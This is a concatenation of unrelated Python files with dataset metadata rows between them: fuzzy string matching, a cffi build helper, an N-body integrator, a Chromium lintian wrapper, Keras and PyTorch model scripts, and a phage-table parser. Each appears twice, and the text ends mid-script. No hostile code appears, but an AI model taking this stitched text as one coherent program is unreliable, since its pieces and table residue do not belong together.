def get_end_offset(self, seq_index: int) -> int:
last_block = self.last_block
if not last_block:
return 0
last_block_size = last_block[2]
return last_block[seq_index] + last_block_size
@property
def end_a(self):
return self.get_end_offset(0)
@property
def end_b(self):
return self.get_end_offset(1)
@property
def start_end_a(self) -> IndexRange:
return IndexRange((self.start_a, self.end_a,))
@property
def start_end_b(self) -> IndexRange:
return IndexRange((self.start_b, self.end_b,))
@property
def match_count(self) -> int:
return sum(size for _, _, size in self)
EMPTY_MATCHING_BLOCKS = MatchingBlocks([])
class MatchingBlocksWithMatchedText:
def __init__(self, matching_blocks: Tuple[Tuple[int, int, int], ...], text: str):
self.matching_blocks = matching_blocks
self.text = text
def __iter__(self) -> Iterable[Tuple[int, int, int, str]]:
return (
(a_index, b_index, size, self.text[a_index:a_index + size])
for a_index, b_index, size in self.matching_blocks
)
def __repr__(self):
return str(tuple(self))
def iter_translate_string_view_matching_block(
a_index: int,
b_index: int,
size: int,
a_string_view: StringView,
b_string_view: StringView
) -> Iterable[Tuple[int, int, int]]:
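# Editor's note (added comments, not in the original source): this helper maps
# one matching block expressed in *view* coordinates (junk characters removed)
# back to *original* string coordinates. When the two original substrings
# spanned by the block differ in length (junk fell inside the block on one side
# only), the block is shrunk and retried, emitting several smaller
# original-coordinate blocks instead of one.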
if not size:
return
remaining_view_size = size
view_block_size = remaining_view_size
while view_block_size:
a_original_index = a_string_view.original_index_at[a_index]
b_original_index = b_string_view.original_index_at[b_index]
a_original_size = (
a_string_view.original_index_at[a_index + view_block_size - 1]
- a_original_index
+ 1
)
b_original_size = (
b_string_view.original_index_at[b_index + view_block_size - 1]
- b_original_index
+ 1
)
if a_original_size != b_original_size:
LOGGER.debug('a_size: %d, b_size: %d', a_original_size, b_original_size)
view_block_size -= 1
continue
yield a_original_index, b_original_index, a_original_size
a_index += view_block_size
b_index += view_block_size
remaining_view_size -= view_block_size
view_block_size = remaining_view_size
def translate_string_view_matching_blocks(
matching_blocks: MatchingBlocks,
a_string_view: StringView,
b_string_view: StringView
) -> MatchingBlocks:
return MatchingBlocks([
(a_view_index, b_view_index, view_size)
for ai, bi, size in matching_blocks
for a_view_index, b_view_index, view_size in iter_translate_string_view_matching_block(
ai, bi, size, a_string_view=a_string_view, b_string_view=b_string_view
)
])
def space_is_junk(text: str, index: int) -> bool:
return text[index].isspace()
class FuzzyMatchResult:
def __init__(
self,
a: str,
b: str,
matching_blocks: MatchingBlocks,
is_junk_fn: Optional[T_IsJunkFunction] = None
):
self.a = a
self.b = b
self.matching_blocks = matching_blocks
self.non_empty_matching_blocks = matching_blocks.non_empty
self.is_junk_fn = is_junk_fn
def __repr__(self):
return (
'{}(matching_blocks={}, match_count={}, a_length={}, b_length={})'.format(
type(self).__name__,
self.matching_blocks,
self.matching_blocks.match_count,
len(self.a),
len(self.b)
)
)
def ratio_to(self, size: int) -> float:
if not size:
return 0.0
return self.matching_blocks.match_count / size
def get_first_chunk_matching_blocks(
haystack: str,
needle: str,
matching_blocks: MatchingBlocks,
threshold: float,
is_junk_fn: T_IsJunkFunction,
match_score_fn: Callable[[FuzzyMatchResult], float]
) -> MatchingBlocks:
matching_blocks = matching_blocks.non_empty
block_count = len(matching_blocks)
while block_count:
chunk_matching_blocks = MatchingBlocks(matching_blocks[:block_count])
chunk_needle_start = chunk_matching_blocks.start_b
chunk_needle_end = chunk_matching_blocks.end_b
LOGGER.debug(
'chunk_needle_start: %s, chunk_needle_end: %s',
chunk_needle_start, chunk_needle_end
)
if chunk_needle_end <= chunk_needle_start:
break
chunk_needle = needle[chunk_needle_start:chunk_needle_end]
fm = FuzzyMatchResult(
haystack,
chunk_needle,
chunk_matching_blocks,
is_junk_fn=is_junk_fn
)
ratio = match_score_fn(fm)
LOGGER.debug('temp fm: %s (ratio: %s)', fm, ratio)
if ratio >= threshold:
LOGGER.debug('chunk_needle: %s', chunk_needle)
return chunk_matching_blocks
block_count -= 1
return EMPTY_MATCHING_BLOCKS
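# --- Editor's usage sketch (illustration only, not part of the module) -------
# One way the pieces above can be combined: build whitespace-free views of two
# strings, diff the views, then translate the matching blocks back to offsets
# in the original strings. difflib is used only for this illustration; the
# module itself does not depend on it.
#
#     from difflib import SequenceMatcher
#
#     a, b = 'the cat', 'thecat'
#     a_view = StringView(a, [not c.isspace() for c in a])
#     b_view = StringView(b, [not c.isspace() for c in b])
#     raw_blocks = MatchingBlocks(
#         SequenceMatcher(None, str(a_view), str(b_view)).get_matching_blocks()
#     )
#     blocks = translate_string_view_matching_blocks(raw_blocks, a_view, b_view)
#     fm = FuzzyMatchResult(a, b, blocks)
#     print(fm.ratio_to(len(b)))   # 1.0: every character of `b` is matched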
| 6,838 | 783 | 367 |
fc950b593505a95c7eb4c6d9b319b9c560f20f10 | 3,763 | py | Python | lib_pypy/_cffi_ssl/_cffi_src/utils.py | yxzoro/pypy | 6e47b3d3e5513d9639a21554963a6ace172ccfee | [
"Apache-2.0",
"OpenSSL"
] | 10 | 2018-12-18T18:04:28.000Z | 2021-04-23T07:31:13.000Z | lib_pypy/_cffi_ssl/_cffi_src/utils.py | yxzoro/pypy | 6e47b3d3e5513d9639a21554963a6ace172ccfee | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | lib_pypy/_cffi_ssl/_cffi_src/utils.py | yxzoro/pypy | 6e47b3d3e5513d9639a21554963a6ace172ccfee | [
"Apache-2.0",
"OpenSSL"
] | 3 | 2019-06-22T14:16:57.000Z | 2021-12-29T22:04:42.000Z | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import sys
from distutils.ccompiler import new_compiler
from distutils.dist import Distribution
from cffi import FFI
def build_ffi_for_binding(module_name, module_prefix, modules, libraries=[],
extra_compile_args=[], extra_link_args=[]):
"""
Modules listed in ``modules`` should have the following attributes:
* ``INCLUDES``: A string containing C includes.
* ``TYPES``: A string containing C declarations for types.
* ``FUNCTIONS``: A string containing C declarations for functions.
* ``MACROS``: A string containing C declarations for any macros.
* ``CUSTOMIZATIONS``: A string containing arbitrary top-level C code, this
can be used to do things like test for a define and provide an
alternate implementation based on that.
"""
types = []
includes = []
functions = []
macros = []
customizations = []
for name in modules:
__import__(module_prefix + name)
module = sys.modules[module_prefix + name]
types.append(module.TYPES)
macros.append(module.MACROS)
functions.append(module.FUNCTIONS)
includes.append(module.INCLUDES)
customizations.append(module.CUSTOMIZATIONS)
# We include functions here so that if we got any of their definitions
# wrong, the underlying C compiler will explode. In C you are allowed
# to re-declare a function if it has the same signature. That is:
# int foo(int);
# int foo(int);
# is legal, but the following will fail to compile:
# int foo(int);
# int foo(short);
#
# XXX <arigo> No, it is a bad idea. OpenSSL itself tends to tweak
# the definitions, like adding a 'const' (see issue #2575). Every
# time they do so, it makes a gratuitous break in this code. It is
# better to rely on the C compiler for that, which is a little bit
# more flexible. That's the point of set_source(). We can still
# re-enable the line ``#functions +`` below to get the original
# behavior. (I would enable it during tests, but I don't find any
# custom test at all..??)
#
verify_source = "\n".join(
includes +
#functions +
customizations
)
ffi = build_ffi(
module_name,
cdef_source="\n".join(types + functions + macros),
verify_source=verify_source,
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
return ffi
def compiler_type():
"""
Gets the compiler type from distutils. On Windows with MSVC it will be
"msvc". On OS X and linux it is "unix".
"""
dist = Distribution()
dist.parse_config_files()
cmd = dist.get_command_obj('build')
cmd.ensure_finalized()
compiler = new_compiler(compiler=cmd.compiler)
return compiler.compiler_type
| 33.900901 | 79 | 0.662503 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import sys
from distutils.ccompiler import new_compiler
from distutils.dist import Distribution
from cffi import FFI
def build_ffi_for_binding(module_name, module_prefix, modules, libraries=[],
extra_compile_args=[], extra_link_args=[]):
"""
Modules listed in ``modules`` should have the following attributes:
* ``INCLUDES``: A string containing C includes.
* ``TYPES``: A string containing C declarations for types.
* ``FUNCTIONS``: A string containing C declarations for functions.
* ``MACROS``: A string containing C declarations for any macros.
* ``CUSTOMIZATIONS``: A string containing arbitrary top-level C code, this
can be used to do things like test for a define and provide an
alternate implementation based on that.
"""
types = []
includes = []
functions = []
macros = []
customizations = []
for name in modules:
__import__(module_prefix + name)
module = sys.modules[module_prefix + name]
types.append(module.TYPES)
macros.append(module.MACROS)
functions.append(module.FUNCTIONS)
includes.append(module.INCLUDES)
customizations.append(module.CUSTOMIZATIONS)
# We include functions here so that if we got any of their definitions
# wrong, the underlying C compiler will explode. In C you are allowed
# to re-declare a function if it has the same signature. That is:
# int foo(int);
# int foo(int);
# is legal, but the following will fail to compile:
# int foo(int);
# int foo(short);
#
# XXX <arigo> No, it is a bad idea. OpenSSL itself tends to tweak
# the definitions, like adding a 'const' (see issue #2575). Every
# time they do so, it makes a gratuitous break in this code. It is
# better to rely on the C compiler for that, which is a little bit
# more flexible. That's the point of set_source(). We can still
# re-enable the line ``#functions +`` below to get the original
# behavior. (I would enable it during tests, but I don't find any
# custom test at all..??)
#
verify_source = "\n".join(
includes +
#functions +
customizations
)
ffi = build_ffi(
module_name,
cdef_source="\n".join(types + functions + macros),
verify_source=verify_source,
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
return ffi
def build_ffi(module_name, cdef_source, verify_source, libraries=[],
extra_compile_args=[], extra_link_args=[]):
ffi = FFI()
ffi.cdef(cdef_source)
ffi.set_source(
module_name,
verify_source,
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
return ffi
def extra_link_args(compiler_type):
if compiler_type == 'msvc':
# Enable NX and ASLR for Windows builds on MSVC. These are enabled by
# default on Python 3.3+ but not on 2.x.
return ['/NXCOMPAT', '/DYNAMICBASE']
else:
return []
def compiler_type():
"""
Gets the compiler type from distutils. On Windows with MSVC it will be
"msvc". On OS X and linux it is "unix".
"""
dist = Distribution()
dist.parse_config_files()
cmd = dist.get_command_obj('build')
cmd.ensure_finalized()
compiler = new_compiler(compiler=cmd.compiler)
return compiler.compiler_type
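# --- Editor's usage sketch (illustration only, not part of this module) ------
# build_ffi_for_binding() expects importable submodules exposing INCLUDES,
# TYPES, FUNCTIONS, MACROS and CUSTOMIZATIONS strings. The lower-level
# build_ffi() can also be called directly; the module name and C snippets
# below are made up for illustration:
#
#     ffi = build_ffi(
#         "_example_cffi",
#         cdef_source="int example_add(int, int);",
#         verify_source="static int example_add(int a, int b) { return a + b; }",
#     )
#     # ffi.compile() would then emit the _example_cffi extension module.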
| 595 | 0 | 46 |
1aee3f2ab511244210373f62c8dcdbdfdb567918 | 3,531 | py | Python | tupan/integrator/sakura.py | ggf84/tupan | 67d3aa103d77248a04e8f112930ba7bdb55024b2 | [
"MIT"
] | 1 | 2016-06-12T19:43:51.000Z | 2016-06-12T19:43:51.000Z | tupan/integrator/sakura.py | ggf84/tupan | 67d3aa103d77248a04e8f112930ba7bdb55024b2 | [
"MIT"
] | 1 | 2021-09-24T13:28:57.000Z | 2021-09-24T13:28:57.000Z | tupan/integrator/sakura.py | ggf84/tupan | 67d3aa103d77248a04e8f112930ba7bdb55024b2 | [
"MIT"
] | 3 | 2015-11-03T15:35:31.000Z | 2021-03-02T17:41:27.000Z | # -*- coding: utf-8 -*-
#
"""
TODO.
"""
from __future__ import print_function, division
import logging
from ..integrator import Base
from ..lib import extensions
from ..lib.utils.timing import decallmethods, timings
__all__ = ["Sakura"]
logger = logging.getLogger(__name__)
def sakura_step(ps, tau):
"""
"""
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
extensions.sakura.calc(ps, ps, tau/2, -1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
extensions.sakura.calc(ps, ps, tau/2, 1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
return ps
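# Editor's note (added for clarity, not part of the original module):
# sakura_step() above is a drift/correct/drift composition: a half-step linear
# drift of the positions, two calls into the compiled extensions.sakura.calc
# kernel whose dr*/dv* increments are applied to positions and velocities, and
# a closing half-step drift. A full integration simply iterates it, e.g.
#
#     # for _ in range(n_steps):          # n_steps and tau chosen by the caller
#     #     ps = sakura_step(ps, tau)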
@decallmethods(timings)
class Sakura(Base):
"""
"""
PROVIDED_METHODS = ['sakura', 'asakura',
]
def __init__(self, eta, time, ps, method, **kwargs):
"""
"""
super(Sakura, self).__init__(eta, time, ps, **kwargs)
self.method = method
self.e0 = None
def initialize(self, t_end):
"""
"""
logger.info("Initializing '%s' integrator.",
self.method)
ps = self.ps
if self.reporter:
self.reporter.diagnostic_report(ps)
if self.dumpper:
self.dumpper.dump_worldline(ps)
if self.viewer:
self.viewer.show_event(ps)
self.is_initialized = True
def finalize(self, t_end):
"""
"""
logger.info("Finalizing '%s' integrator.",
self.method)
ps = self.ps
if self.viewer:
self.viewer.show_event(ps)
self.viewer.enter_main_loop()
def get_sakura_tstep(self, ps, eta, tau):
"""
"""
ps.set_tstep(ps, eta)
iw2_a = (eta/ps.tstep)**2
iw2_b = (eta/ps.tstepij)**2
diw2 = (iw2_a - iw2_b)
w2_sakura = diw2.max()
dt_sakura = eta/(1 + w2_sakura)**0.5
ps.tstep[...] = dt_sakura
min_bts = self.get_min_block_tstep(ps, tau)
return min_bts
def do_step(self, ps, tau):
"""
"""
# p0 = p.copy()
# if self.e0 is None:
# self.e0 = p0.kinetic_energy + p0.potential_energy
# de = [1]
# tol = tau**2
# nsteps = 1
#
# while abs(de[0]) > tol:
# p = p0.copy()
# dt = tau / nsteps
# for i in range(nsteps):
# p = sakura_step(p, dt)
# e1 = p.kinetic_energy + p.potential_energy
# de[0] = e1/self.e0 - 1
# if abs(de[0]) > tol:
## nsteps += (nsteps+1)//2
# nsteps *= 2
## print(nsteps, de, tol)
# break
if "asakura" in self.method:
tau = self.get_sakura_tstep(ps, self.eta, tau)
ps = sakura_step(ps, tau)
type(ps).t_curr += tau
ps.tstep[...] = tau
ps.time += tau
ps.nstep += 1
if self.dumpper:
slc = ps.time % (self.dump_freq * tau) == 0
if any(slc):
self.wl.append(ps[slc])
if self.viewer:
slc = ps.time % (self.gl_freq * tau) == 0
if any(slc):
self.viewer.show_event(ps[slc])
return ps
########## end of file ##########
| 21.662577 | 62 | 0.481167 | # -*- coding: utf-8 -*-
#
"""
TODO.
"""
from __future__ import print_function, division
import logging
from ..integrator import Base
from ..lib import extensions
from ..lib.utils.timing import decallmethods, timings
__all__ = ["Sakura"]
logger = logging.getLogger(__name__)
def sakura_step(ps, tau):
"""
"""
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
extensions.sakura.calc(ps, ps, tau/2, -1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
extensions.sakura.calc(ps, ps, tau/2, 1)
ps.rx += ps.drx
ps.ry += ps.dry
ps.rz += ps.drz
ps.vx += ps.dvx
ps.vy += ps.dvy
ps.vz += ps.dvz
ps.rx += ps.vx * tau / 2
ps.ry += ps.vy * tau / 2
ps.rz += ps.vz * tau / 2
return ps
@decallmethods(timings)
class Sakura(Base):
"""
"""
PROVIDED_METHODS = ['sakura', 'asakura',
]
def __init__(self, eta, time, ps, method, **kwargs):
"""
"""
super(Sakura, self).__init__(eta, time, ps, **kwargs)
self.method = method
self.e0 = None
def initialize(self, t_end):
"""
"""
logger.info("Initializing '%s' integrator.",
self.method)
ps = self.ps
if self.reporter:
self.reporter.diagnostic_report(ps)
if self.dumpper:
self.dumpper.dump_worldline(ps)
if self.viewer:
self.viewer.show_event(ps)
self.is_initialized = True
def finalize(self, t_end):
"""
"""
logger.info("Finalizing '%s' integrator.",
self.method)
ps = self.ps
if self.viewer:
self.viewer.show_event(ps)
self.viewer.enter_main_loop()
def get_sakura_tstep(self, ps, eta, tau):
"""
"""
ps.set_tstep(ps, eta)
iw2_a = (eta/ps.tstep)**2
iw2_b = (eta/ps.tstepij)**2
diw2 = (iw2_a - iw2_b)
w2_sakura = diw2.max()
dt_sakura = eta/(1 + w2_sakura)**0.5
ps.tstep[...] = dt_sakura
min_bts = self.get_min_block_tstep(ps, tau)
return min_bts
def do_step(self, ps, tau):
"""
"""
# p0 = p.copy()
# if self.e0 is None:
# self.e0 = p0.kinetic_energy + p0.potential_energy
# de = [1]
# tol = tau**2
# nsteps = 1
#
# while abs(de[0]) > tol:
# p = p0.copy()
# dt = tau / nsteps
# for i in range(nsteps):
# p = sakura_step(p, dt)
# e1 = p.kinetic_energy + p.potential_energy
# de[0] = e1/self.e0 - 1
# if abs(de[0]) > tol:
## nsteps += (nsteps+1)//2
# nsteps *= 2
## print(nsteps, de, tol)
# break
if "asakura" in self.method:
tau = self.get_sakura_tstep(ps, self.eta, tau)
ps = sakura_step(ps, tau)
type(ps).t_curr += tau
ps.tstep[...] = tau
ps.time += tau
ps.nstep += 1
if self.dumpper:
slc = ps.time % (self.dump_freq * tau) == 0
if any(slc):
self.wl.append(ps[slc])
if self.viewer:
slc = ps.time % (self.gl_freq * tau) == 0
if any(slc):
self.viewer.show_event(ps[slc])
return ps
########## end of file ##########
| 0 | 0 | 0 |
03380b9fc4bc2791f31e4a4be7f09ddd23a207d8 | 1,238 | py | Python | src/python/serif/model/impl/event_mention/eat_event_mention_model.py | BBN-E/text-open | c508f6caeaa51a43cdb0bc27d8ed77e5750fdda9 | [
"Apache-2.0"
] | 2 | 2022-03-24T14:37:51.000Z | 2022-03-24T19:56:45.000Z | src/python/serif/model/impl/event_mention/eat_event_mention_model.py | BBN-E/text-open | c508f6caeaa51a43cdb0bc27d8ed77e5750fdda9 | [
"Apache-2.0"
] | null | null | null | src/python/serif/model/impl/event_mention/eat_event_mention_model.py | BBN-E/text-open | c508f6caeaa51a43cdb0bc27d8ed77e5750fdda9 | [
"Apache-2.0"
] | null | null | null | from serif.model.event_mention_model import EventMentionModel
# Modified from DummyEventMentionModel
| 38.6875 | 76 | 0.630048 | from serif.model.event_mention_model import EventMentionModel
# Modified from DummyEventMentionModel
class EatEventMentionModel(EventMentionModel):
def __init__(self,**kwargs):
super(EatEventMentionModel,self).__init__(**kwargs)
def get_event_mention_info(self, sentence):
# Create an EventMention whenever there is an FOOD
# mentioned in the same sentence as a DOG
tuples = []
event_type = 'EAT'
food_role = 'participant_food'
dog_role = 'participant_dog'
foods = [m for m in sentence.mention_set if m.entity_type == 'FOOD']
dogs = [m for m in sentence.mention_set if m.entity_type == 'DOG']
for food_mention in foods:
if len(dogs) == 0:
continue
for dog_mention in dogs:
food_argument_spec = (food_role, food_mention, 1.0)
dog_argument_spec = (dog_role, dog_mention, 1.0)
arg_specs = [food_argument_spec, dog_argument_spec]
anchor_node = food_mention.syn_node.head
event_mention_info = \
(event_type, anchor_node, 0.75, arg_specs)
tuples.append(event_mention_info)
return tuples
| 1,035 | 25 | 75 |
165f9269e37cdf991334a589b6a3a94353b51f85 | 1,401 | py | Python | chrome/installer/linux/debian/lint_package.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668 | 2015-01-01T01:57:10.000Z | 2022-03-31T23:33:32.000Z | chrome/installer/linux/debian/lint_package.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | chrome/installer/linux/debian/lint_package.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5,941 | 2015-01-02T11:32:21.000Z | 2022-03-31T16:35:46.000Z | #!/usr/bin/env python
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Performs some static analysis checks on Chrome debian packages
using lintian.
"""
import argparse
import os
import subprocess
SUPPRESSIONS = [
# Google Chrome is not software available on a distro by default,
# so installing to /opt is correct behavior.
'dir-or-file-in-opt',
# Distros usually don't like libraries to be statically linked
# into binaries because it's easier to push a security patch on a
# single package than to update many packages. Chromium
# statically links some libraries anyway.
'embedded-library',
# The setuid sandbox is a setuid binary.
'setuid-binary',
# Some nacl binaries are statically linked but don't have "static"
# in their name.
'statically-linked-binary',
# Build configurations with is_official_build=false don't compress
# the packages.
'uses-no-compression-for-data-tarball',
]
parser = argparse.ArgumentParser()
parser.add_argument('package', help='path/to/package.deb')
args = parser.parse_args()
package = os.path.abspath(args.package)
cmd = [
'lintian',
package,
'--no-tag-display-limit',
'--pedantic',
'--suppress-tags',
','.join(SUPPRESSIONS)
]
subprocess.check_call(cmd)
| 28.591837 | 72 | 0.710921 | #!/usr/bin/env python
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Performs some static analysis checks on Chrome debian packages
using lintian.
"""
import argparse
import os
import subprocess
SUPPRESSIONS = [
# Google Chrome is not software available on a distro by default,
# so installing to /opt is correct behavior.
'dir-or-file-in-opt',
# Distros usually don't like libraries to be statically linked
# into binaries because it's easier to push a security patch on a
# single package than to update many packages. Chromium
# statically links some libraries anyway.
'embedded-library',
# The setuid sandbox is a setuid binary.
'setuid-binary',
# Some nacl binaries are statically linked but don't have "static"
# in their name.
'statically-linked-binary',
# Build configurations with is_official_build=false don't compress
# the packages.
'uses-no-compression-for-data-tarball',
]
parser = argparse.ArgumentParser()
parser.add_argument('package', help='path/to/package.deb')
args = parser.parse_args()
package = os.path.abspath(args.package)
cmd = [
'lintian',
package,
'--no-tag-display-limit',
'--pedantic',
'--suppress-tags',
','.join(SUPPRESSIONS)
]
subprocess.check_call(cmd)
| 0 | 0 | 0 |
3394d0d604868b37054722470e6cda2033718cb5 | 898 | py | Python | scripts/mlp_functional_api.py | sanikamal/awesome-dl-examples | 1e7ef5fc879dd6c1c659bb74ba45963a036e9dcd | [
"MIT"
] | null | null | null | scripts/mlp_functional_api.py | sanikamal/awesome-dl-examples | 1e7ef5fc879dd6c1c659bb74ba45963a036e9dcd | [
"MIT"
] | null | null | null | scripts/mlp_functional_api.py | sanikamal/awesome-dl-examples | 1e7ef5fc879dd6c1c659bb74ba45963a036e9dcd | [
"MIT"
] | null | null | null | """
Multilayer Perceptron model for binary classification.
The model has 10 inputs, 3 hidden layers with 10, 20, and 10 neurons,and an output layer with 1 output.
Rectified linear activation functions are used in each hidden layer
and a sigmoid activation function is used in the output layer,for binary classification."""
import tensorflow as tf
# from tensorflow.keras.utils import plot_model
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import Dense
visible = Input(shape=(10,))
hidden1 = Dense(10, activation= 'relu' )(visible)
hidden2 = Dense(20, activation= 'relu' )(hidden1)
hidden3 = Dense(10, activation= 'relu' )(hidden2)
output = Dense(1, activation= 'sigmoid' )(hidden3)
model = Model(inputs=visible, outputs=output)
# summarize layers
model.summary()
# plot graph
# plot_model(model, to_file= 'mlp_graph.png' )
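# --- Editor's usage sketch (not part of the original script) -----------------
# The usual next steps would be compile() and fit(); the data below is random
# and purely illustrative:
#
#     import numpy as np
#     model.compile(optimizer='adam', loss='binary_crossentropy',
#                   metrics=['accuracy'])
#     X = np.random.rand(128, 10)
#     y = (np.random.rand(128) > 0.5).astype('float32')
#     model.fit(X, y, epochs=5, batch_size=16)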
| 35.92 | 103 | 0.771715 | """
Multilayer Perceptron model for binary classification.
The model has 10 inputs, 3 hidden layers with 10, 20, and 10 neurons,and an output layer with 1 output.
Rectified linear activation functions are used in each hidden layer
and a sigmoid activation function is used in the output layer,for binary classification."""
import tensorflow as tf
# from tensorflow.keras.utils import plot_model
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import Dense
visible = Input(shape=(10,))
hidden1 = Dense(10, activation= 'relu' )(visible)
hidden2 = Dense(20, activation= 'relu' )(hidden1)
hidden3 = Dense(10, activation= 'relu' )(hidden2)
output = Dense(1, activation= 'sigmoid' )(hidden3)
model = Model(inputs=visible, outputs=output)
# summarize layers
model.summary()
# plot graph
# plot_model(model, to_file= 'mlp_graph.png' )
| 0 | 0 | 0 |
f8b325c42287a9461b7a0d381cfcfa2fe0c14536 | 764 | py | Python | src/scratch-scripts/feature-extraction.py | kanazashi-s/pytorch-faster-rcnn-from-scratch- | 4a482dcda30c10e609468251dd0222d27718b9b1 | [
"MIT"
] | null | null | null | src/scratch-scripts/feature-extraction.py | kanazashi-s/pytorch-faster-rcnn-from-scratch- | 4a482dcda30c10e609468251dd0222d27718b9b1 | [
"MIT"
] | null | null | null | src/scratch-scripts/feature-extraction.py | kanazashi-s/pytorch-faster-rcnn-from-scratch- | 4a482dcda30c10e609468251dd0222d27718b9b1 | [
"MIT"
] | null | null | null | #%%
# Prepare the image, bounding boxes, and labels
import torch
import torch.nn as nn
image = torch.zeros((1, 3, 800, 800)).float()
bbox = torch.FloatTensor([[20, 30, 400, 500], [300, 400, 500, 600]]) # [y1, x1, y2, x2] format
labels = torch.LongTensor([6, 8]) # 0 represents background
sub_sample = 16
#%%
# Use VGG16 as the backbone
# Trim the network so that the VGG16 output feature map size becomes 800//16 = 50
import torchvision
dummy_img = torch.zeros((1, 3, 800, 800)).float()
model = torchvision.models.vgg16(pretrained=False)
vgg_layers = list(model.features)
req_features = []
k = dummy_img.clone()
for i in vgg_layers:
k = i(k)
if k.size()[2] < 800//16:
break
req_features.append(i)
out_channels = k.size()[1]
# The feature extractor is now complete
faster_rcnn_fe_extractor = nn.Sequential(*req_features) | 22.470588 | 94 | 0.683246 | #%%
# Prepare the image, bounding boxes, and labels
import torch
import torch.nn as nn
image = torch.zeros((1, 3, 800, 800)).float()
bbox = torch.FloatTensor([[20, 30, 400, 500], [300, 400, 500, 600]]) # [y1, x1, y2, x2] format
labels = torch.LongTensor([6, 8]) # 0 represents background
sub_sample = 16
#%%
# Use VGG16 as the backbone
# Trim the network so that the VGG16 output feature map size becomes 800//16 = 50
import torchvision
dummy_img = torch.zeros((1, 3, 800, 800)).float()
model = torchvision.models.vgg16(pretrained=False)
vgg_layers = list(model.features)
req_features = []
k = dummy_img.clone()
for i in vgg_layers:
k = i(k)
if k.size()[2] < 800//16:
break
req_features.append(i)
out_channels = k.size()[1]
# The feature extractor is now complete
faster_rcnn_fe_extractor = nn.Sequential(*req_features) | 0 | 0 | 0 |
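# --- Editor's usage sketch (not part of the original notebook cell) ----------
# Passing the dummy image through the truncated VGG16 backbone should give a
# feature map downsampled by sub_sample=16, i.e. about (1, 512, 50, 50):
#
#     out_map = faster_rcnn_fe_extractor(image)
#     print(out_map.shape)    # expected: torch.Size([1, 512, 50, 50])
#     print(out_channels)     # 512 for this VGG16 truncation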
d6058fc0135c215b14d942d5fdc9670339794089 | 621 | py | Python | parserscripts/parsers/find_accession.py | nataliyah123/phageParser | bc05d76c23d37ee80ffa2bbf6e7e977341bab3ee | [
"MIT"
] | 65 | 2017-05-10T15:26:18.000Z | 2022-03-07T07:10:12.000Z | parserscripts/parsers/find_accession.py | nataliyah123/phageParser | bc05d76c23d37ee80ffa2bbf6e7e977341bab3ee | [
"MIT"
] | 143 | 2017-03-22T22:55:16.000Z | 2020-02-13T15:52:03.000Z | parserscripts/parsers/find_accession.py | nataliyah123/phageParser | bc05d76c23d37ee80ffa2bbf6e7e977341bab3ee | [
"MIT"
] | 44 | 2017-03-22T20:47:16.000Z | 2022-03-15T21:45:12.000Z | import csv
| 27 | 78 | 0.594203 | import csv
class PhageFinder:
PHAGE_NAME = 0
CLUSTER = 1
EXIST_IN_GENBANK = 4
ACCESSION = 5
def __init__(self, infile, **kwargs):
blast_file = open(infile, 'r')
self.reader = csv.reader(blast_file, dialect=csv.excel_tab)
def find_by_phage(self, phage, cluster):
for row in self.reader:
# check if phage exists
if phage in row[self.PHAGE_NAME] and cluster in row[self.CLUSTER]:
# check if exists in genbank
if 'True' in row[self.EXIST_IN_GENBANK]:
return row[self.ACCESSION]
return -1
| 457 | 129 | 23 |
63cf1de58478f20d0e49a8733ad3d5d780a783fb | 6,386 | py | Python | codes/python/3-neural_networks/convolutional-neural-network/cnn_cifar10.py | jswanglp/TensorFlow-Course | d40faf3f86af8edc3b8181e17d7101ab928a1135 | [
"MIT"
] | null | null | null | codes/python/3-neural_networks/convolutional-neural-network/cnn_cifar10.py | jswanglp/TensorFlow-Course | d40faf3f86af8edc3b8181e17d7101ab928a1135 | [
"MIT"
] | null | null | null | codes/python/3-neural_networks/convolutional-neural-network/cnn_cifar10.py | jswanglp/TensorFlow-Course | d40faf3f86af8edc3b8181e17d7101ab928a1135 | [
"MIT"
] | null | null | null | #@title datasets_tutorials(cifar-10) { display-mode: "both" }
# coding: utf-8
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# from functools import reduce
import tensorflow_datasets as tfds
import numpy as np
import time
# tf.logging.set_verbosity(tf.logging.ERROR)
if __name__ == '__main__':
# filepath = '/content/GoogleDrive/Python27/MNIST_data'
# # filepath = r'E:\Anaconda2\Programs\MNIST_data'
# mnist = input_data.read_data_sets(filepath, one_hot=True)
# mnist_train = tfds.load("mnist", split=tfds.Split.TRAIN)
